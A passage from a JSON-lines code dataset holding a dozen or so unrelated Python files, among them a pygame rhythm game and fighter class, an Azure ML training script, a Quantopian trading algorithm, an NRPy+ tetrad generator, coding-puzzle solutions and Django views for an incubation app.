FLAGS.training_percentage, FLAGS.testing_percentage,\n FLAGS.memory_representation, FLAGS.window_size)\ndata = train + test\nn_test = len(test) / 4\n\nvocab = sorted(reduce(lambda x, y: x | y, (set(list(chain.from_iterable(s)) + q + c + a) for s, q, c, a in data))) # if FLAGS.data == 'cbt' else sorted(reduce(lambda x, y: x | y, (set(list(chain.from_iterable(s)) + q + a) for s, q, a in data)))\nif None in vocab:\n vocab.remove(None)\n\ntoken_counter = Counter(list(chain.from_iterable(list(list(chain.from_iterable(s)) + q + c + a) for s, q, c, a in data)))\n\npred = []\nif FLAGS.baseline == \"corpus\":\n for elem in test:\n tmp = []\n for w in elem[2]:\n tmp.append(token_counter[w])\n pred.append(elem[2][np.argmax(tmp)])\nelse:\n for elem in test:\n context_counter = Counter(list(list(chain.from_iterable(elem[0])) + elem[1] + elem[2] + elem[3]))\n tmp = []\n for w in elem[2]:\n tmp.append(context_counter[w])\n pred.append(elem[2][np.argmax(tmp)])\n\nlabels = [elem[3][0] for elem in test]\nif FLAGS.data == 'cbt':\n word_types = {0: 'NE', 1: 'CN', 2: 'V', 3: 'P'}\n for i in range(4):\n acc = metrics.accuracy_score(labels[i*n_test:(i+1)*n_test], pred[i*n_test:(i+1)*n_test])\n logger.info('Testing Accuracy ({0}): {1:.3f}'.format(word_types[i], acc))\nelse:\n acc = metrics.accuracy_score(labels, pred)\n logger.info('Testing Accuracy: {0:.3f}'.format(acc))\n","sub_path":"key_value_memory/baseline_models.py","file_name":"baseline_models.py","file_ext":"py","file_size_in_byte":4025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"150884064","text":"import urllib.request\nfrom bs4 import BeautifulSoup\nf=urllib.request.urlopen(urllib.request.Request(\"http://www.team4adventure.com/\",data=None,headers={ 'User-Agent': 'Mozilla/5.0(Macintosh; Intel Mac OS X 10_9_3)AppleWebKit/537.36(KHTML, like Gecko)Chrome/35.0.1916.47 Safari/537.36'}))\nsoup=BeautifulSoup(f.read().decode('utf-8'),\"html.parser\")\nfor script in soup([\"script\",\"style\"]):\n script.extract()\ntext=soup.get_text()\nt=text.casefold()\nL1=list(set(t.split()))\nfile = open(\"F:\\\\PYTHON\\\\practice\\\\urlcontent.txt\",\"w\")\nfor w in L1:\n file.write(w+'\\n')\nfile.close()\nf=open('urlcontent.txt')\nwhile True:\n if len(f.read())==0:\n break\n setline=set(line.split())\nf.close()\nf=open('team4adventure.txt')\nwhile True:\n if len(f.read())==0:\n break\n setign=set(line.split())\nf.close()\nresult=set(setline).intersection(setign)\nD={}\nfor n in result:\n print(n,round(((L.count(n)/len(L))*100),2))\n\n\n\n\n\n\n","sub_path":"SEO Keyword Density Analyzer.py","file_name":"SEO Keyword Density Analyzer.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"374379309","text":"\"\"\"\nCopyright (C) Microsoft Corporation. All rights reserved.​\n ​\nMicrosoft Corporation (“Microsoft”) grants you a nonexclusive, perpetual,\nroyalty-free right to use, copy, and modify the software code provided by us\n(\"Software Code\"). You may not sublicense the Software Code or any use of it\n(except to your affiliates and to vendors to perform work on your behalf)\nthrough distribution, network access, service agreement, lease, rental, or\notherwise. This license does not purport to express any claim of ownership over\ndata you may have shared with Microsoft in the creation of the Software Code.\nUnless applicable law gives you more rights, Microsoft reserves all other\nrights not expressly granted herein, whether by implication, estoppel or\notherwise. ​\n ​\nTHE SOFTWARE CODE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS\nOR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\nMICROSOFT OR ITS LICENSORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\nSPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\nPROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\nBUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER\nIN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\nARISING IN ANY WAY OUT OF THE USE OF THE SOFTWARE CODE, EVEN IF ADVISED OF THE\nPOSSIBILITY OF SUCH DAMAGE.\n\"\"\"\nfrom azureml.core.run import Run\nimport os\nimport argparse\nfrom sklearn.linear_model import Ridge\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import train_test_split\nimport joblib\nimport json\n\n\ndef train_model(run, data, alpha):\n run.log(\"alpha\", alpha)\n run.parent.log(\"alpha\", alpha)\n reg = Ridge(alpha=alpha)\n reg.fit(data[\"train\"][\"X\"], data[\"train\"][\"y\"])\n preds = reg.predict(data[\"test\"][\"X\"])\n run.log(\"mse\", mean_squared_error(\n preds, data[\"test\"][\"y\"]), description=\"Mean squared error metric\")\n run.parent.log(\"mse\", mean_squared_error(\n preds, data[\"test\"][\"y\"]), description=\"Mean squared error metric\")\n return reg\n\n\ndef main():\n print(\"Running train.py\")\n\n parser = argparse.ArgumentParser(\"train\")\n parser.add_argument(\n \"--build_id\",\n type=str,\n help=\"The build ID of the build triggering this pipeline run\",\n )\n parser.add_argument(\n \"--model_name\",\n type=str,\n help=\"Name of the Model\",\n default=\"sklearn_regression_model.pkl\",\n )\n\n parser.add_argument(\n \"--step_output\",\n type=str,\n help=(\"output for passing data to next step\")\n )\n\n args = parser.parse_args()\n\n print(\"Argument [build_id]: %s\" % args.build_id)\n print(\"Argument [model_name]: %s\" % args.model_name)\n print(\"Argument [step_output]: %s\" % args.step_output)\n\n model_name = args.model_name\n build_id = args.build_id\n step_output_path = args.step_output\n\n print(\"Getting training parameters\")\n\n with open(\"config.json\") as f:\n pars = json.load(f)\n try:\n alpha = pars[\"training\"][\"alpha\"]\n except KeyError:\n alpha = 0.5\n\n print(\"Parameter alpha: %s\" % alpha)\n\n run = Run.get_context()\n\n # Get the dataset\n dataset = run.input_datasets['training_data']\n if (dataset):\n df = dataset.to_pandas_dataframe()\n X = df.drop('Y', axis=1).values\n y = df['Y'].values\n else:\n e = (\"No dataset provided\")\n print(e)\n raise Exception(e)\n\n X_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=0.2, random_state=0)\n data = {\"train\": {\"X\": X_train, \"y\": y_train},\n \"test\": {\"X\": X_test, \"y\": y_test}}\n\n reg = train_model(run, data, alpha)\n\n # Pass model file to next step\n os.makedirs(step_output_path, exist_ok=True)\n model_output_path = os.path.join(step_output_path, model_name)\n joblib.dump(value=reg, filename=model_output_path)\n\n # Also upload model file to run outputs for history\n os.makedirs('outputs', exist_ok=True)\n output_path = os.path.join('outputs', model_name)\n joblib.dump(value=reg, filename=output_path)\n\n # Add properties to identify this specific training run\n run.parent.tag(\"BuildId\", value=build_id)\n run.tag(\"BuildId\", value=build_id)\n run.tag(\"run_type\", value=\"train\")\n builduri_base = os.environ.get(\"BUILDURI_BASE\")\n if (builduri_base is not None):\n build_uri = builduri_base + build_id\n run.tag(\"BuildUri\", value=build_uri)\n run.parent.tag(\"BuildUri\", value=build_uri)\n print(f\"tags now present for run: {run.tags}\")\n\n run.complete()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"diabetes_regression/training/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"194931179","text":"#coding : utf-8\n\nimport pygame\nimport json\n\nsrcpath = \"./resource/\"\n\ndef now():\n return pygame.time.get_ticks() - startup_time\n\nclass music_sign(object):\n def __init__(self,img_path,channal=0,speed=5,showup_time=0):\n global channals\n global time\n\n self.surface = pygame.image.load(srcpath + img_path).convert()\n\n # 加入轨道\n self.channal = channal\n channals[channal].append(self)\n\n self.showup_time = showup_time\n\n # 位置,速度,状态\n self.y = 0\n self.x = channal * 100\n self.speed = speed\n # 实际速度(像素/秒) = self.speed * 帧率\n self.status = -2\n # 0 正在下落\n # -1 已经错过\n # 1 已经弹奏\n # 2 可被弹奏\n # -2 没有到出现时间\n\n def move(self):\n global startup_time\n if pygame.time.get_ticks() - startup_time >= self.showup_time:\n self.status = 0\n \n if self.status == -2:\n return False\n\n if self.y >= 768:\n self.status = -1\n elif self.y <= 600 and self.y >= 500:\n self.status = 2\n \n self.y += self.speed\n \n def show(self):\n if self.status >= 0:\n global screen\n screen.blit(self.surface,(self.x,self.y))\n\n\ndef create_sign_from_dict(d):\n return music_sign(\n img_path = d.get(\"img_path\"),\n channal = d.get(\"channal\"),\n speed = d.get(\"speed\"),\n showup_time = d.get(\"showup_time\"),\n )\n\ndef create_signs():\n # 开始设计\n # 实际速度(像素/秒) = self.speed * 帧率\n # showup_time单位为毫秒(1s = 1000ms)\n # channal以0开始,最高为7\n with open(\"./recorder/mus.json\",'r') as json_file:\n channals = json.load(json_file)\n for channal in channals:\n for sign in channal:\n create_sign_from_dict(sign)\n json_file.close()\n\nif __name__ == \"__main__\":\n score = 500 # 计分\n time = 0 # 计时\n\n # 初始化\n pygame.init()\n screen = pygame.display.set_mode((1024,768), 0, 32)\n pygame.display.set_caption(\"OMG MUSIC\")\n\n surface_background = pygame.image.load(srcpath+\"img/background.bmp\").convert()\n surface_line = pygame.image.load(srcpath+\"img/line.bmp\").convert()\n\n # 轨道(通道)\n channal0 = []\n channal1 = []\n channal2 = []\n channal3 = []\n channal4 = []\n channal5 = []\n channal6 = []\n channal7 = []\n channals = (channal0,channal1,channal2,channal3,channal4,channal5,channal6,channal7)\n\n # 加载音符\n create_signs()\n\n fps_clock = pygame.time.Clock()\n startup_time = pygame.time.get_ticks()\n\n # 主循环\n while True:\n fps_clock.tick(60)\n \n tuple_key =(\n pygame.K_a,\n pygame.K_s,\n pygame.K_d,\n pygame.K_f,\n pygame.K_g,\n pygame.K_h,\n pygame.K_j,\n pygame.K_k\n )\n\n # 处理输入\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if event.key in tuple_key:\n channal_id = tuple_key.index(event.key)\n for sign in channals[channal_id]:\n if sign.status == 2:\n #可被弹奏\n sign.status = 1\n score += 20\n print(\"channal[%d]弹奏成功,sing.status=%d,分数=%d\" % (channal_id,sign.status,score))\n\n if event.type == pygame.QUIT:\n pygame.quit()\n exit()\n\n # 绘制背景\n screen.blit(surface_background,(0,0))\n screen.blit(surface_line,(0,600))\n\n # 绘制音符\n for channal in channals:\n for sign,i in zip(channal,range(len(channal))):\n # 检查是否没有被演奏\n if sign.status in (-1,1):\n print('移除了一个元素,原因:',sign.status)\n channal.pop(i)\n else:\n sign.show()\n sign.move()\n \n # 刷新屏幕\n pygame.display.update()\n print(\"Time:\",now(),\"FPS:\",fps_clock.get_fps(),end='\\r')\n\n# Todo\n# 连按慢速音符轨道导致多次计分\n# 会存在\\r引起的print的问题,不影响后续\n","sub_path":"OMGMusicGame/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"216979651","text":"import pygame\n\nclass Fighter(object):\n \n def __init__(self,x,y,width,height,OneOrTwo):\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n self.vel = 7\n self.isJump = False\n self.isDown = False\n self.isSpecial = True\n self.jumpCounter = 10\n self.abaixado = y+height/3\n self.emPe = y\n self.walkCount = 0\n self.standCount = 0\n self.jumpCount = 0\n self.downCount = 0\n self.waiting = 0\n self.waitingSpecial = 0\n self.number = OneOrTwo\n self.walkChar = [pygame.image.load(str(OneOrTwo)+'/walk/w1.png'),pygame.image.load(str(OneOrTwo)+'/walk/w2.png'),pygame.image.load(str(OneOrTwo)+'/walk/w3.png'),pygame.image.load(str(OneOrTwo)+'/walk/w4.png'),pygame.image.load(str(OneOrTwo)+'/walk/w5.png'),pygame.image.load(str(OneOrTwo)+'/walk/w6.png'),pygame.image.load(str(OneOrTwo)+'/walk/w7.png'),pygame.image.load(str(OneOrTwo)+'/walk/w8.png'),pygame.image.load(str(OneOrTwo)+'/walk/w9.png')]\n self.standChar = [pygame.image.load(str(OneOrTwo)+'/stand/stand1.png'),pygame.image.load(str(OneOrTwo)+'/stand/stand2.png'),pygame.image.load(str(OneOrTwo)+'/stand/stand3.png'),pygame.image.load(str(OneOrTwo)+'/stand/stand4.png'),pygame.image.load(str(OneOrTwo)+'/stand/stand5.png'),pygame.image.load(str(OneOrTwo)+'/stand/stand6.png'),pygame.image.load(str(OneOrTwo)+'/stand/stand7.png')]\n self.jumpChar = [pygame.image.load(str(OneOrTwo)+'/jump/j1.png'),pygame.image.load(str(OneOrTwo)+'/jump/j2.png'),pygame.image.load(str(OneOrTwo)+'/jump/j3.png')]\n self.downChar = [pygame.image.load(str(OneOrTwo)+'/down/d1.png'),pygame.image.load(str(OneOrTwo)+'/down/d2.png'),pygame.image.load(str(OneOrTwo)+'/down/d3.png')]\n self.specialChar = [pygame.image.load(str(OneOrTwo)+'/special/s1.png'),pygame.image.load(str(OneOrTwo)+'/special/s2.png'),pygame.image.load(str(OneOrTwo)+'/special/s3.png'),pygame.image.load(str(OneOrTwo)+'/special/s4.png')]\n\n def moveLeft(self):\n \n if(self.x> self.vel): \n self.x-= self.vel\n if not self.isJump:\n self.y = self.emPe\n self.left = True\n self.ultimate = False\n self.right = False\n self.isDown = False\n \n\n def moveRight(self,modeWidth):\n \n if(self.x= -10:\n neg = 1\n if self.jumpCounter < 0 :\n neg = -1\n self.y-= (self.jumpCounter **2)*0.5*neg\n self.jumpCounter -=1 \n else:\n self.isJump = False\n self.jumpCounter = 10\n\n \n def special(self):\n if(self.isSpecial):\n self.isSpecial = False\n self.ultimate = True\n elif(self.waitingSpecial > 30):\n self.isSpecial = True\n self.waitingSpecial = 0\n self.ultimate = True\n else:\n self.ultimate = False \n \n\n \n \n def drawFighter(self,gameDisplay):\n \n if not (self.isJump):\n \n if not (self.isDown):\n if self.left :\n gameDisplay.blit(self.walkChar[self.walkCount%len(self.walkChar)],(self.x,self.y))\n self.waiting +=1\n self.standCount = 0\n self.jumpCount = 0\n if self.walkCount<0:\n self.walkCount = len(self.walkChar) - 1\n\n if self.waiting>1:\n self.walkCount-= 1\n self.waiting = 0\n\n elif self.right:\n gameDisplay.blit(self.walkChar[self.walkCount%len(self.walkChar)],(self.x,self.y))\n self.waiting +=1\n self.walkCount+= 1\n self.standCount = 0\n self.jumpCount = 0\n if self.waiting>1:\n self.walkCount-= 1\n self.waiting = 0\n \n elif (self.ultimate):\n contador = 0\n self.waiting = 0\n gameDisplay.blit(self.specialChar[contador],(self.x,self.y))\n while(self.waiting<100000):\n self.waiting += 1\n self.walkCount = 0\n self.jumpCount = 0\n \n if self.waiting == 20000 and contador1:\n self.standCount +=1\n self.waiting = 0\n \n else:gameDisplay.blit(self.downChar[2],(self.x,self.y))\n \n \n else: \n if self.jumpCount >= 0 and self.jumpCount < 5 :\n gameDisplay.blit(self.jumpChar[0],(self.x,self.y))\n elif self.jumpCount >= 5 and self.jumpCount <= 13:\n gameDisplay.blit(self.jumpChar[1],(self.x,self.y))\n elif self.jumpCount > 13 and self.jumpCount <= 20:\n gameDisplay.blit(self.jumpChar[0],(self.x,self.y))\n else : gameDisplay.blit(self.jumpChar[2],(self.x,self.y))\n \n self.jumpCount+=1","sub_path":"src/scratch/Fighter.py","file_name":"Fighter.py","file_ext":"py","file_size_in_byte":6702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"293058070","text":"import os\nimport psutil\nimport threading\n\n\ndef print_processes():\n for pid in psutil.pids():\n try:\n psutil.Process(pid).exe()\n except BaseException:\n pass\n\n\ndef print_count():\n print(\"start\")\n count = 0\n while True:\n count += 1\n print(count)\n\n\ndef write_file():\n fo = open(\"xxx.cmd\", \"w\")\n fo.write(\"helloworld111111\")\n fo.close()\n\n\ndef print_processes_per_sec():\n print_processes()\n timer = threading.Timer(1, print_processes_per_sec)\n timer.start()\n\n\nprint_count()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"480669530","text":"\"\"\"\nStrategy \n1) セクターが違う銘柄を5つ\n2) 毎週月曜日の取引開始時間(米市場は09:30)前に,過去30日と10日平均の乖離から各銘柄を自己資金の何%Long��しくはShortするかを判断\n3) start日〜end日まで5銘柄保有する.\n\"\"\"\n\nimport pandas as pd \ndef initialize(context):\n\n # 業種の違う銘柄を適当に5つ選出\n # MSFT, HD, XOM, C, GE\n context.security_list = [sid(5061), sid(3496), sid(8347), sid(1335), sid(3149)]\n \n ## pandasのSeriesオブジェクトを用意.ログを出力用\n context.long_securities = pd.Series()\n context.short_securities = pd.Series()\n\n # 毎週月曜日(もしお休みなら,週明け最初の取引日)の,取引開始時(米09:30)にrebalanceを実行する.\n schedule_function(my_rebalance,\n date_rules.week_start(days_offset=0),\n time_rules.market_open())\n\n \n # 毎日取引終了時刻に,my_log,ログ出力\n schedule_function(my_log,\n date_rules.week_start(days_offset=0),\n time_rules.market_open())\n\n # 毎日取引終了時刻に,record_varsを実行して,描画\n schedule_function(my_record_vars,\n date_rules.every_day(),\n time_rules.market_close())\n \n\n \ndef compute_weights(context, data):\n \"\"\"\n それぞれの銘柄をどの程度保有するか,ウェイトを計算する\n \"\"\"\n # 5つの銘柄の過去30日分の終値を取得\n hist = data.history(context.security_list, 'price', 30, '1d')\n\n # 10日分/30日分の過去データをそれぞれ変数にいれる.\n prices_10 = hist.tail(10)\n prices_30 = hist\n\n # 平均を出す\n mean_10 = prices_10.mean()\n mean_30 = prices_30.mean()\n\n # 30日平均と10日平均の差が,30日平均と比べてどの程度違うのか.\n raw_weights = (mean_10 - mean_30) / mean_30\n\n # それぞれの銘柄を他の銘柄のraw_weightと比較して,ウェイトを作る.\n normalized_weights = raw_weights / raw_weights.abs().sum()\n\n # normalized_weightsがポジティブの場合は,ロング\n # normalized_weightsがネガティブの場合は,ショートする.\n # この情報を出力するために,contextに情報を入れる\n context.short_securities = normalized_weights[normalized_weights < 0].index\n context.long_securities = normalized_weights[normalized_weights > 0].index\n\n return normalized_weights # pandas.Series \n\ndef my_rebalance(context, data):\n \"\"\"\n rebalance: ポジション調整.\n\n \"\"\"\n normalized_weights = compute_weights(context, data)\n\n # 5銘柄をひとつずつ注文.\n for security in normalized_weights.index:\n # この銘柄が現在トレード出来るかどうか確認.\n if data.can_trade(security):\n # weight は pandas.Series なので,normalized_weights[security]でその銘柄のウェイトにアクセス出来る\n order_target_percent(security, normalized_weights[security])\n\ndef my_record_vars(context, data):\n \"\"\"\n 5銘柄それぞれ\n record():折れ線グラフを描画.5本まで.\n \"\"\"\n asset0 = context.security_list[0]\n asset1 = context.security_list[1]\n asset2 = context.security_list[2]\n asset3 = context.security_list[3]\n asset4 = context.security_list[4]\n \n # Record our variables.\n record(asset0.symbol, context.portfolio.positions[asset0].amount * data.current(asset0,'price'),\n asset1.symbol, context.portfolio.positions[asset1].amount * data.current(asset1,'price'),\n asset2.symbol, context.portfolio.positions[asset2].amount * data.current(asset2,'price'),\n asset3.symbol, context.portfolio.positions[asset3].amount * data.current(asset3,'price'),\n asset4.symbol, context.portfolio.positions[asset4].amount * data.current(asset4,'price'),\n )\n\ndef my_log(context, data): \n if context.long_securities.any():\n log.info(\"This week's longs: \" + \", \".join([long_.symbol for long_ in context.long_securities]))\n if context.short_securities.any():\n log.info(\"This week's shorts: \" + \", \".join([short_.symbol for short_ in context.short_securities]))\n\n ","sub_path":"algorithms/Tokyo Quantopian User Group Vol2 handson 5 stocks/backtests/Backtest 4-5a1f8870337ed745944c8821.py","file_name":"Backtest 4-5a1f8870337ed745944c8821.py","file_ext":"py","file_size_in_byte":4330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"150524881","text":"# As documented in the NRPy+ tutorial module\n# Tutorial-Psi4_tetrads_Ccode_function.ipynb,\n# this module construct the C code function\n# for generating the tetrads necessary for\n# computing \\psi_4 (as well as other\n# Weyl scalars and invariants in principle)\n\n# Author: Zachariah B. Etienne\n# (zachetie **at** gmail **dot* com)\n\n# Step 1.a: import all needed modules from NRPy+:\nimport sympy as sp\nfrom outputC import *\nimport NRPy_param_funcs as par\nimport indexedexp as ixp\nimport grid as gri\nimport finite_difference as fin\nimport reference_metric as rfm\n\ndef Psi4_tetrads_Ccode_function(tetrad_Ccode_filename = \"BSSN/Psi4_tetrad.h\",TetradChoice=\"QuasiKinnersley\",version=2):\n # Step 1.b: Given the chosen coordinate system, set up\n # corresponding reference metric and needed\n # reference metric quantities\n # The following function call sets up the reference metric\n # and related quantities, including rescaling matrices ReDD,\n # ReU, and hatted quantities.\n rfm.reference_metric()\n\n # Step 1.c: Import the tetrad module\n if version==1:\n import BSSN.Psi4_tetrads as BP4T\n par.set_parval_from_str(\"BSSN.Psi4_tetrads::TetradChoice\", TetradChoice)\n else:\n import BSSN.Psi4_tetradsv2 as BP4T\n par.set_parval_from_str(\"BSSN.Psi4_tetradsv2::TetradChoice\", TetradChoice)\n\n # Step 2: Construct the C function header and \n # convert (xx0,xx1,xx2) to the corresponding\n # (x,y,z), as both are needed for the tetrad\n # expressions.\n outCparams = \"preindent=1,outCfileaccess=a,outCverbose=False,includebraces=False\"\n\n with open(tetrad_Ccode_filename, \"w\") as file:\n file.write(\"\"\"\n// Taking as input (xx0,xx1,xx2), this function outputs\n// the chosen Psi4 tetrad in the (xx0,xx1,xx2) basis\nvoid Psi4_tetrad(const REAL xx0,const REAL xx1,const REAL xx2, const REAL *in_gfs,\n const int i0,const int i1,const int i2,\n REAL n4U[4],REAL mre4U[4],REAL mim4U[4]) {\n\"\"\")\n outputC([rfm.xxCart[0],rfm.xxCart[1],rfm.xxCart[2]],[\"REAL x\",\"REAL y\",\"REAL z\"],tetrad_Ccode_filename,\n outCparams+\",CSE_enable=False\") \n # Step 3: Output the tetrad in the reference-metric basis.\n\n # Step 3.a: BP4T.Psi4_tetrads() to construct the symbolic\n # expressions for the tetrad vectors $n^\\mu$,\n # $\\Re m^\\mu$, and $\\Im m^\\mu$, which are needed\n # to construct $\\Psi_4$.\n\n if version==1:\n BP4T.Psi4_tetrads()\n else:\n BP4T.Psi4_tetradsv2()\n Psi4_tetrad_vecs = []\n\n # Step 3.b: As the tetrad expressions depend on BSSN\n # gridfunctions, we pass the expressions into\n # fin.FD_outputC() so that the needed gridfunction\n # values are read in from memory as appropriate.\n for i in range(4):\n Psi4_tetrad_vecs.append(lhrh(lhs=\"n4U[\" + str(i) + \"]\", rhs=BP4T.n4U[i]))\n Psi4_tetrad_vecs.append(lhrh(lhs=\"mre4U[\" + str(i) + \"]\", rhs=BP4T.mre4U[i]))\n Psi4_tetrad_vecs.append(lhrh(lhs=\"mim4U[\" + str(i) + \"]\", rhs=BP4T.mim4U[i]))\n\n fin.FD_outputC(tetrad_Ccode_filename, Psi4_tetrad_vecs, outCparams)\n\n with open(tetrad_Ccode_filename, \"a\") as file:\n file.write(\"}\\n\")","sub_path":"BSSN/Psi4_tetrads_Ccode_function.py","file_name":"Psi4_tetrads_Ccode_function.py","file_ext":"py","file_size_in_byte":3273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"604183302","text":"#\n# @lc app=leetcode.cn id=117 lang=python3\n#\n# [117] 填充每个节点的下一个右侧节点指针 II\n#\n\n# @lc code=start\n\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, val: int = 0, left: 'Node' = None, right: 'Node' = None, next: 'Node' = None):\n self.val = val\n self.left = left\n self.right = right\n self.next = next\n\"\"\"\n\nclass Solution:\n def connect(self, root: 'Node') -> 'Node':\n if not root:\n return None\n \n queue = [root]\n while queue:\n num = len(queue)\n for i in range(num):\n if i+1 < num:\n queue[i].next = queue[i+1]\n \n tmp = []\n for n in queue:\n if n.left:\n tmp.append(n.left)\n if n.right:\n tmp.append(n.right)\n queue = tmp\n \n return root\n\n# @lc code=end","sub_path":"LeetCode/0117/广度优先.py","file_name":"广度优先.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"503659469","text":"import sys\n\n\nfrom detective import BaseinfoParser\nfrom detective import ChangedFileListParser\nfrom detective import LogInfo\nfrom git_help import Gitcommand\nfrom repo_helper import *\nfrom nose.tools import ok_\nfrom nose.tools import eq_\nclass TestBaseinfoParser:\n def setUp(self):\n self.parser=BaseinfoParser(step_length=1)\n prepareGitrepo()\n\n def tearDown(self):\n cleanupRepo()\n if os.path.exists(\"detective.txt\"):\n os.popen(\"rm -rf detective.txt\")\n self.logs=None\n self.parser = None\n\n def test_Parse_log_with_step_length_1(self):\n logs = Gitcommand().log(\"--before='2012-08-20 00:00:00'\",\"testrepo/\")\n log_1=LOG_1_BASE\n log_2=LOG_2_BASE\n expected_info=[log_1,log_2] \n eq_(expected_info,self.parser.parse(logs,0)[0])\n def test_Parse_log_with_step_length_2(self):\n logs = Gitcommand().log(\"--before='2012-08-20 00:00:00'\",\"testrepo/\")\n self.parser=BaseinfoParser(step_length=2)\n expected_info=LOG_1_BASE\n eq_([expected_info],self.parser.parse(logs,0)[0])\n eq_(expected_info.date(),self.read_from_config_file())\n def test_Parse_log_with_step_length_4_and_init_count_1(self):\n six_line_logs = Gitcommand().log(\"--after='2012-08-19 00:00:00'\",\"testrepo/\")\n self.parser=BaseinfoParser(step_length=3)\n expected_info1=LOG_3_BASE\n expected_info2=LOG_MORE_BASE\n\n (result,count) = self.parser.parse(six_line_logs,1)\n eq_([expected_info1,expected_info2],result)\n eq_(1,count)\n eq_(LOG_MORE_BASE.date(),self.read_from_config_file())\n def test_write_info_to_config_file(self):\n self.parser.write_to_logfile(LOG_1_BASE)\n ok_(os.path.exists(\"detective.txt\"))\n eq_(LOG_1_BASE.date(),self.read_from_config_file(),self.read_from_config_file())\n def read_from_config_file(self):\n f = open(\"detective.txt\",\"r\")\n item_info= f.readline()\n f.close()\n return item_info\n","sub_path":"test/TestBaseinfoParser.py","file_name":"TestBaseinfoParser.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"536774395","text":"# Python program for the Boy or Girl problem from codeForce\n\n\nprint('Enter the name of the person: ')\nname = input()\nname = list(name)\nnew_name = []\n\nfor element in name:\n if element not in new_name:\n new_name.append(element)\n\n#print(new_name)\n\nif len(new_name) % 2 == 0:\n print('CHAT WITH HER!')\nelse:\n print('IGNORE HIM!')\n \n \n################################################\n#Alternate Solution \n\n#print('Enter the name of the person: ')\n#name = input()\n#name = list(name)\n#name = set(name)\n#if len(name) % 2 == 0:\n# print('CHAT WITH HER!')\n#else:\n# print('IGNORE HIM!')\n \n##########################################################\n","sub_path":"boyOrGirl.py","file_name":"boyOrGirl.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"163063014","text":"from django.core.exceptions import FieldError\nfrom django.shortcuts import render\nfrom django.core import serializers\nfrom django.http import HttpResponse, Http404,HttpResponseNotFound,HttpResponseRedirect\nfrom django.contrib.auth import decorators\nfrom django.utils.dateparse import parse_date\nfrom app.models import Catalogo\nfrom ofertaDemanda.models import Oferta\nfrom usuarios.models import Institucion, Persona\nfrom incubacion.models import Incubacion, Incubada, TiposOfertasIncubacion\nfrom restless.modelviews import Endpoint,ListEndpoint, DetailEndpoint\nfrom restless.auth import BasicHttpAuthMixin,login_required\nfrom restless.models import serialize\nfrom django.views.decorators.csrf import csrf_exempt\n\n\n# Create your views here.\n\n\n\nclass ListIncubaciones(ListEndpoint, BasicHttpAuthMixin):\n model = Incubacion\n @login_required\n def get(self, request):\n incs=[]\n try:\n temp = request.session['id_institucion']\n inst = Institucion.objects.get(idinstitucion=temp)\n incs = Incubacion.objects.filter(autor=inst)\n except KeyError:\n temp = request.user\n temp = Oferta.objects.filter(idusuario=temp)\n for of in temp:\n incubada = Incubada.objects.get(oferta=of)\n incs.append(incubada.incubacion)\n return serialize(incs, include=[\n ('alcance', dict(\n fields=[\n 'codigo',\n 'descripcion',\n ]\n )),\n ('estado',dict(\n fields=[\n 'codigo',\n 'descripcion',\n ]\n )),\n ('autor',dict(\n fields=[\n 'nombre_corto'\n ]\n )),\n ('tipoOfertas',dict(\n fields=[\n 'codigo',\n 'descripcion',\n ]\n )),\n ('ofertasIncubadas',\n lambda a: a.countIncubadas()\n )])\n\n\n@decorators.login_required(login_url='/ingresar/')\ndef homeIncubacion(request):\n #return render(request, 'incubacion_main.html')\n return render(request, 'index-incubacion.html')\n\n\n\n@decorators.login_required(login_url='/ingresar/')\ndef crearIncubacion(request):\n return render(request, 'crear_incubacion.html')\n\n@csrf_exempt\n@decorators.login_required(login_url='/ingresar/')\ndef createIncubacion(request):\n try: \n i = Incubacion()\n i.nombre = request.POST.get('nombre')\n i.descripcion = request.POST.get('descripcion')\n i.condiciones = request.POST.get('condiciones')\n i.perfiles = request.POST.get('perfiles')\n #i.alcance = Catalogo.objects.get(request.POST.get(\"alcanc\"))\n i.alcance = Catalogo.objects.get(id=2)\n temp = request.POST.getlist('tipoOf')\n autor = Institucion.objects.get(idinstitucion=request.session['id_institucion'])\n i.autor = autor\n i.estado = Catalogo.objects.get(id=8)\n i.save()\n\n for a in 